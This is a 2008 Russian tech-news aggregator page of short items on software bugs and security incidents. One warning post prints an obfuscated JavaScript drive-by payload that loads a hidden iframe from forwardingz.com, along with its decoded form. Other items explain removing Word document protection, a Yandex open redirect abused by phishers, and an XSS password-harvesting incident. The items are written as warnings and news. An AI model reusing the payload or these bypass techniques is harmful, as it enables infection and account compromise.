Новый софт   
  
  rss  :  стартовой  :  избранное  :  расширенный поиск  :  скачать  :  Опросы  :  Форум    :  недорогой хостинг
 Новый софт - Ошибки и исправления


Синий экран смерти в неожиданных местах

 Послать статью другу Версия для печати 

Непопулярный «Синий экран смерти» (Blue Screen of Death — BSOD) вряд ли выпал из вида любого человека, работающего перед компьютером в течение нескольких лет. Даже в том случае, если на родных просторах кто-то, активно использовавший все блага компьютерных технологий так и не увидел собственными глазами удручающую синеву, то наверняка знает человека, которому это удалось.

Еще в начале октября была опубликована забавная галерея снимков с синим экраном смерти в самых неожиданных местах на планете, причем далеко не исключительно на экране PC.

Попробуем взглянуть на лучшие образцы работы операционной системы Windows (не подумайте, что я имею что-то против Microsoft — они забавные):

 
читать дальше (264 cлова) Послать комментарий
комментариев (0)

Платформа Android шалит: лучше не печатать слово «reboot»

 Послать статью другу Версия для печати 

Баги — штука неприятная, но некоторые из них вполне могут позабавить. Именно такая ошибка была обнаружена в ПО платформы Android.



Как оказалось, всю, абсолютно всю вводимую пользователем информацию система незаметно интерпретирует как команды и выполняет их с правами администратора. Таким образом, если, например, набрать на клавиатуре слово «reboot» и нажать клавишу ввода, то устройство просто перезагрузится. Действуют и другие команды, так что стоит избегать комбинации «rm» (команда удаления файлов).

Известно, что ошибка присутствует в прошивке версии 1.0 TC4-RC29 и более ранних версий. Прошивка RC30 лишена этого бага, однако многие пользователи T-Mobile G1 еще не успели обновить до неё свои коммуникаторы.

cyberstyle.ru
 
Послать комментарий
комментариев (0)

5 простых шагов для увеличения быстродействия Windows Vista

 Послать статью другу Версия для печати 

Параметры быстродействия Windows остаются нетронутыми со времен Windows 2000. Я понимаю, что разработчики перестраховываются, установив параметры в реестре на средний уровень, дабы стабильность работы была гарантирована некоторым запасом в производительности, но нам то с вами терять нечего, не так ли?  Привожу 5 советов по настройке Windows Vista, которые добавят быстродействия, а так же позволят избавиться от ненужных для некоторых функций.

Начнем с увеличения скорости открытия меню Пуск. Запускаем редактор реестра regedit.exe. Ветка [HKEY_CURRENT_USER/Control Panel/Desktop]: ключ типа String с именем MenuShowDelay, значение 400 меняем на 0. Теперь меню Пуск будет открываться без задержки в 400 милисекунд.

 
читать дальше (477 cлова) Послать комментарий
комментариев (0)

Сотовый телефон и ноутбук могут вызвать авиакатастрофу

 Послать статью другу Версия для печати 



Пассажирский рейсовый аэробус компании Quantas, пролетая над Индийским океаном, внезапно потерял управление. Машина вошла в пике. Непристегнутые пассажиры и члены команды ударились о потолок салона, получив ушибы и серьёзные травмы. Через несколько минут управление восстановилось, и самолёт совершил аварийную посадку на военном аэродроме в Западной Австралии.

В то время как пострадавшие предъявляют авиакомпании судебные иски, специалисты строят версии того, что именно произошло с самолётом в воздухе.

Сначала эксперты пытались объяснить произошедшее обледенением одного или обоих сенсоров системы управления самолетом. Спустя некоторое время официальные лица Quantas сообщили, что происшествие было вызвано ошибкой навигационного компьютера. Но последнее сообщение специалистов компании удивило и шокировало многих: предполагается, что неполадки автопилота были вызваны влиянием электронного прибора, принадлежащего одному из пассажиров. Это могли быть ноутбук, сотовый телефон или игровая приставка.

Все мы слышали о нежелательности использования мобильных телефонов и ноутбуков в салоне самолёта, но немногие воспринимают это предостережение всерьёз. Люди, знакомые с предметом не понаслышке, утверждают, что сигналы управления внутри воздушного корабля передаются по проводам, надежно экранированным от радионаводок беспроводных устройств. Однако следователи из Австралийского бюро безопасности транспорта обнаружили, что во время одного из недавних авиарейсов компании Quanta щелчок беспроводной мыши пассажира изменил курс аэробуса на три градуса.

Джулиан Уолш, глава комитета, ведущего расследование, сообщил, что следователи "не знают и не понимают до конца механизм произошедшего".

securitylab.ru
 
Послать комментарий
комментариев (0)

Обход парольной защиты в документах ms word. (OFFICE11)

 Послать статью другу Версия для печати 

Данная информация предоставленна толька для ознакомления

И чёрт меня дернул поставить пароль на это документ и чёрт же помог мне его забыть…
Гугление и открывание в опенофисе не помогло. И тут я вспомнил про то, что ворд умеет сохранять документы как html… не то (побилось форматирование), но уже близко.

Затем я заметил xml, документ был немедленно сохранен и открыт в текстовом редакторе с поддержкой utf8. Поиск по «pass» выдал следующее:

<w: documentProtection w: edit=«read-only» w: enforcement=«on» w: unprotectPassword=«D218CFF4»/>


Удаление этой «лишней строки» вернуло мне возможность правки документа.

Было проделанно на OFFICE11 (2003), возможно работает с OFFICE12 (2007).
Для эксель и подобных не проверял.

habrahabr.ru
 
Послать комментарий
комментариев (0)

Бот поисковика Cuil "убивает" сайты

 Послать статью другу Версия для печати 



Появились данные о том, что бот Twiceler, который обходит сайты "по заданию" Cuil, работает некорректно, в результате чего многие ресурсы "падают".

"Я не знаю, каким образом это происходит, однако когда Cuil пытается проиндексировать сайт, тот ложится под напором трафика, - сообщил TechCrunch анонимный источник. - Мы находимся в индексе Cuil двадцать четыре часа, и я был вынужден сократить пропуск трафика до двух пакетов в секунду, иначе сайтом невозможно пользоваться".

Дискуссии по поводу индексации сайтов ботом Cuil развернулись на форумах Admin Zone. Многие админы находят метод работы Twiceler некорректным.Они заявляют, что Twiceler действует как дилетант: поисковый бот беспорядочно бомбардирует сайт запросами, пытаясь проиндексировать страницы, на которые невозможно попасть по ссылкам, путем генерации псевдослучайных URL - действуя случайным образом (и увеличивая базу).

В Cuil заявляют, что бот - экспериментальный, постоянно модернизирующийся, и отмечают, что он не игнорирует файл robots.txt и не лезет на сайты, которые отказываются от индексации. Кроме того, часть инцидентов может быть не связана с Cuil, подчеркивают в компании.

securitylab.ru
 
Послать комментарий
комментариев (0)

Сам себе антивирус

 Послать статью другу Версия для печати 

Жизнь компьютера идет своим чередом, но в один прекрасный момент комп перезагружается, а потом на рабочем столе появляется надпись «У вас вирусы, антивирус качать тут». Кто-то скачивает и ставит, кто-то сносит винду, кому-то везет и его антивирус ловит заразу… А я вам попробую рассказать как решить проблему самому и зачем это нужно.
 
читать дальше (956 cлова) Послать комментарий
комментариев (0)

Опять какой-то вирус…

 Послать статью другу Версия для печати 

В последнее время от некоторых людей из контакт-листа стала приходить ссылка на gif-картинку. Ссылка приведена ниже, но нажимать _НЕ_ советую.
h_ttp://feels-energy.com/img/live.gif
вот исходный текст этой страницы с постфиксом .gif:
<img src="2410232.jpg">
<script>
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,
116,112,58,47,47,102,111,114,119,97,114,100,105,110,103,122,46,99,111,109,47,115,116,97,
116,115,47,114,117,49,46,112,104,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,
97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62))</script>
А это примерно обозначает следующее:
<iframe src="h_ttp://forwardingz.com/stats/ru1.php" style="display:none"></iframe>

В общем, теперь всем должно быть стремно открывать даже такие вот «безобидные» gif'ы… :)

by ognevsky.habrahabr.ru/blog/38194/
 
Послать комментарий
комментариев (0)

Мифы настройки и оптимизации Windows

 Послать статью другу Версия для печати 

Некоторые мифы, окружающие оптимизацию Windows, преследуют нас в статьях, на сайтах, программах-твикерах. Однако, они не имеют ничего общего с реальностью, поэтому следование этим советам может нанести лишь вред. Вот примеры таких мифов.
 
читать дальше (938 cлова) Послать комментарий
комментариев (0)

Сверхчистая загрузка Windows с максимальными правами

 Послать статью другу Версия для печати 

Я желаю, чтобы вам не было нужды пользоваться нашим следующим советом, но порой у всех возникает необходимость загрузить Windows не грузя ни лишние сервисы, ни тем более вирусы и трояны. Причём здесь есть тонкость - войдя в любую учётную запись, даже администраторскую, мы всё равно имеем ограничения по доступу к файлам раз, и загрузку всяческих службы и программ два. А для проверки на вирус лучше бы не иметь ни того, ни другого. Как это сделать?
 
читать дальше (235 cлова) Послать комментарий
комментариев (0)

Стив Джобс подтвердил наличие серьезной уязвимости в iPhone

 Послать статью другу Версия для печати 

Исполнительный директор Apple Стив Джобс (Steve Jobs) подтвердил наличие так называемого "черного хода" в свежем программном обеспечении для iPhone. Благодаря программной уязвимости в устройстве, стало возможным удалять приложения, установленные Apple по умолчанию. В интервью Wall Street Journal, Джобс заметил, что "черный ход" был намеренно добавлен в iPhone как мера безопасности.



"Господин Джобс заметил, что такая возможность существует, аргументировав это тем, что Apple нуждается в ней в случае, если устройство непреднамеренно активирует вредоносную программу, которая похищает личные данные пользователей, к примеру ", - сообщает Wall Street Journal.

"К счастью, мы еще не дергали за этот рычаг, но было бы безответственно с нашей стороны такой рычаг не предусмотреть", - сказал Джобс. По словам главы Apple, через Apple iPhone App Store было продано программного обеспечения на $ 30 миллионов только за первый месяц запуска проекта. Любопытно, что без особых оснований из App Store была удалена программа I Am Rich стоимостью $ 999, делавшая экран чем-то большим, чем сияющий бриллиант.

news.ferra.ru
 
Послать комментарий
комментариев (0)

Яндекс-маркет - находка для фишера

 Послать статью другу Версия для печати 

Анализируя спам, валящийся в почту, обнаружил невеселую весчь.

Оказывается, нажимая ссылку "где купить" в Яндекс-маркете мы просто отправляем урл сайта через GET. Яндекс делает тупой редирект на адрес указанный в URL.

т.е. ссылка, приведенная ниже, обманчиво показывает нам, что она на яндексе, хотя ведет на ЖЖ (порезана)

Вот вам линк, жмите

Этим уже успели воспользоваться фишеры и спамеры для редиректов на свои сайты
 
читать дальше (2 cлова) Послать комментарий
комментариев (0)

Исследователи смоделировали убийство через Интернет

 Послать статью другу Версия для печати 

Человеческое сердце может быть уязвимым не только для сердечно-сосудистых болезней, но и для хакерских атак. Об этом заявили исследователи из университетов Вашингтона и Массачусетса. Угроза касается людей с вживленными электронными кардиостимуляторами нового поколения. Устройства позволяют врачу постоянно контролировать самочувствие больного через компьютер и с помощью Интернета. Однако этим могут воспользоваться и злоумышленники и, организовав виртуальную атаку на свою жертву, положить начало новой эпохе террора и шантажа.

Свои опасения ученые проверили с помощью лабораторного моделирования. Через Интернет они смогли взломать вживляемый сердечный имплантат гипотетического пациента и получили доступ к его личным данным через радиоаппарат, встроенный в кардиостимулятор. А напоследок перепрограммировали устройство и послали на него мощный электрический сигнал, способный остановить работу сердца.

Кандидат медицинских наук, старший научный сот­рудник Отдела клинической электрофизиологии Института экспериментальной кардиологии Вячеслав Киктев пояснил, что «во многие современные кардиоимплантаты теперь встраивают программаторы.Это специальные устройства, которые отвечают за удаленную связь с дефибриллятором на определенной частоте. Теперь врач-кардиолог может на расстоянии, скажем, два-три метра наблюдать и при необходимости вносить какие-то поправки в работу сердечного стимулятора. И чисто теоретически это дает возможность для подключения к нему злоумышленников».

Многие современные электронные приборы представляют собой, по сути, маленькие компьютеры с процессором и набором программ. И если они могут контролироваться удаленно, то не защищены и от внешней атаки, убеждены ИТ-эксперты. «Вариантов нарушения работы кардиостимулятора может быть множество, — считает аналитик систем информационной безопасности компании «Информзащита» Михаил Савельев. — К примеру, вместо трех байт, которые способно «переварить» устройство, на него посылают шесть. Нарушить функционирование программы можно также переполнением буфера команд, которые она должна выполнить. Таким образом, виртуальное нападение на электронный кардиостимулятор мало отличается от хакерской атаки на обычный компьютер».

Сделанное открытие всерьез обеспокоило западных врачей. В США насчитывается около 100 тыс. граждан, живущих с кардиостимуляторами. Злоумышленнику достаточно лишь завладеть доступом к электронному имплантату, и жизнь любого из них окажется в его руках. Затраты же на моделирование хакерской атаки на сердце обошлись ученым в сравнительно небольшую сумму — 30 тыс. долл. Между тем среди носителей кардиостимуляторов достаточно богатых и статусных фигур, в том числе вице-президент Соединенных Штатов Дик Чейни. Поэтому вполне вероятно, что взлом электронного имплантата превратится в будущем в новый метод террора или шантажа крупных бизнесменов и политиков.

securitylab.ru
 
Послать комментарий
комментариев (0)

Поддельные антивирусы наступают

 Послать статью другу Версия для печати 



Проверив систему, AWS предлагает удалить обычные cookies

Недавно «засветившийся» в Рунете продукт для удаления шпионского ПО «фальшивый» Anti-Spyware Pro (ASW) добавлен в список вредоносных программ компанией Agnitum. Кроме того «Веб-контроль» Outpost Firewall Pro теперь будет блокировать сайт программы. Отечественные антивирусные вендоры также признают новый вид угроз в Рунете и констатируют 700%-й рост Rogue Antivirus (лже-антивирусов) по сравнению с прошлым годом.
 
читать дальше (446 cлова) Послать комментарий
комментариев (0)

«Удобная» регистрация

 Послать статью другу Версия для печати 

Помню, как был приятно удивлён очень удобным механизмом авторизации на одном активно обсуждаемом нынче ресурсе. Да, зарегистрироваться и автоматически войти на сайт, введя прямо на главной странице логин и адрес электронной почты — это чумовая фишка. Голова кружится от вебдванольности с первых секунд прибывания на сайте.



Никаких капч и подтверждений регистрации, просто заполняем два поля — и уже можем голосовать за топики, добавлять комментарии, отправлять сообщения по внутренней почте любому другому пользователю... Красота. Но хороша ли такая «быстрая регистрация» с точки зрения безопасности? Однозначно нет! Не делайте так, а то будет вот так:
 
читать дальше (47 cлова) Послать комментарий
комментариев (0)

Создан первый эксплоит для дыры в DNS-серверах

 Послать статью другу Версия для печати 

Как и предполагалось, это не заняло много времени. Спустя две недели после обнаружения Дэном Каминским глобальной уязвимости в системе DNS опубликован первый реальный эксплоит, который использует эту дыру. Эксплоит позволяет модифицировать кэш DNS-сервера таким образом, что запросы к одному сайту перенаправляются на другой сайт незаметно для пользователя.

Новый код уже включён во вредоносный набор Metasploit — коллекцию инструментов для взлома и тестирования сайтов. Авторами эксплоита стали HD Moore (на фото), создатель Metasploit, а также хакер |)ruid.

Код можно посмотреть по этой ссылке.

В интервью прессе (по IM) автор экслоита HD Moore сказал, что программе требуется от одной до двух минут, чтобы внедрить запись в кэш DNS-сервер, это довольно долго, но он обещает оптимизировать программу ко второй версии.

Сам Дэн Камински говорит, что теоретически взломать DNS-сервер через эту дыру можно за несколько секунд.
 
читать дальше (2'126 cлова) Послать комментарий
комментариев (0)

Угроза 9c951267, часть 2

 Послать статью другу Версия для печати 

Из первых рук про 9c951267

Прошел день с того времени, как я сделал попытку убедить людей, что в сети нужно очень тщательно выбирать, кому доверять свои данные (пафосно звучит, правда?)

О том, что же было и что из этого получилось, дальше.


Сайт bestpersons был выбран, конечно, не случайно, но он просто идеален в качестве наглядного пособия по тому, как не нужно делать безопасные сайты. О начале издевательств над ним можно почитать здесь: Сервис хранения паролей и раздачи их всем желающим.

Из-за туманных комментариев владельцев сайта, не утрудивших себя описанием того, что случилось с их сайтом и даже не уведомивших своих пользователей о том, что им нужно сделать (сменить все пароли, которые совпадали с паролем на bestpersons, удалить свой аккаунт ;) ) даже крупные интернет-издания не смогли понять, что же произошло. Ни rian.ru, ни Roem.ru, ни Securitylab не дали реальной версии событий.

 
читать дальше (463 cлова) Послать комментарий
комментариев (0)

Угроза 9c951267, часть 1

 Послать статью другу Версия для печати 

Сервис хранения паролей и раздачи их всем желающим

Недавно нашел интересный сервис - он позволял оставлять на нем свои пароли от разных сайтов и, при желании, постить при желании на все эти сайты сразу из одного интерфейса.

Я сам таким не пользуюсь и плохо понимаю зачем такие сайты нужны, но мне стало интересно, насколько же защищены пароли пользователей на этих сайтах?

Полазив по сервису, нашёл парочку дырок с XSS-уязвимостью. Но на каком сайте их не бывает? Даже на хабре вон не все еще закрыли (хотя хабр и не хранит чужие пароли, ему простительно).

Еще больше я был удивлен, когда узнал, что сменить пароль пользователя и любую его информацию на этом сервисе можно обладая всего лишь его кукой. Такой простой вещи, как ограничение сессий по IP там нет, не говоря уже о требовании ввести пароль при смене критичных данных. А это уже совсем непростительно, даже на хабре такого неуважения к безопасности нет.

Но это не самое смешное. Случайно я обнаружил, что если сменить свой емейл в профиле, то система радостно отправляет на новый емейл незашифрованный пароль пользователя. Это уже ни в какие ворота. Мало того, что даже хранить незашифрованный пароль пользователя нельзя, но отсылать его по почте в открытом виде кому попало...

Все это мне стало настолько интересно, что я решил узнать, что же может добиться хакер на этом сайте?

Написав небольшой скриптик и применив немного психологии (чтобы заставить людей зайти на мой профиль, на котором был этот скрипт), я получил в открытом виде пароли около 400 пользователей сервиса. Учитывая, что 80 и больше процентов людей используют один и тот же пароль на нескольких сайтах (а иногда и на почте), а список сайтов, на которых зарегистрирован пользователь, можно найти прямо в его профиле (это основная "фишка" того сервиса, о котором идет речь), то получается просто рай для злоумышленников.

Написав совсем немного кода на JS можно получить доступ к паролю человека, постить от его имени в другие его блоги (если он настроил эту "фичу" на сервисе), при удаче (или неосторожности пользователя) получить доступ к его аккаунтам на других сайтах.

Что же это за замечательный сервис?
Это bestpersons.ru, программисты которого с гордостью писали о найденных XSS на самом Jaiku! UPD: уже не гордятся :(

Удачи тем, кто использует сервисы, "объединяющие сайты".

з.ы. а еще они предоставляют OpenID ;)

продолжение истории

(с)habrahabr.ru

 
Послать комментарий
комментариев (0)

Баги в играх

 Послать статью другу Версия для печати 

Всякие-разные баги, да и просто забавные ситуации в играх.

 
Послать комментарий
комментариев (0)

Троян с гарантией

 Послать статью другу Версия для печати 

Вредоносное программное обеспечение достаточно давно превратилось в товар, производитель которого наделяет клиента определенными гарантиями.

Однако распространители «супер-трояна», известного под именем Limbo 2, пошли дальше других. Продавая вредоносное приложение за достаточно высокую сумму, хакеры обещают возвратить клиенту потраченную сумму, в случае если вредоносное ПО будет обнаружено.

Новый троян умеет оперативно реагировать на «опасность» и оставаться вне досягаемости для современных систем защиты. Будучи обнаруженным троян автоматически создает свою новую вариацию и снова оказывается невидимым. При этом в процессе превращения приложение не утрачивает своей исходной функциональности.

При проникновении в систему вирус-оборотень действует намного изощреннее, чем обычный «кейлоггер». Этот троян не только сохраняет и передает вводимые пользователем данные, но и подменяет главные страницы открываемых сайтов. Кроме того, Limbo 2 может собирать и пересылать своему хозяину самые разные данные, включая номера кредитных карт, адреса электронной почты, имена пользователей и пароли для входа в систему, а также любую другую персональную информацию, обнаруженную на жестком диске ПК.

securitylab.ru
 
Послать комментарий
комментариев (0)
RedTram
 Копирайт © 2008 Новый софт
 Все торговые марки и копирайты на этой странице являются собственностью соответствующих хозяев.
 Для связи с администрацией сайта, телефон в Киеве 5927467, ICQ 5714034
 Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq
Работает на Geeklog 
Страница создана за 0.63 секунд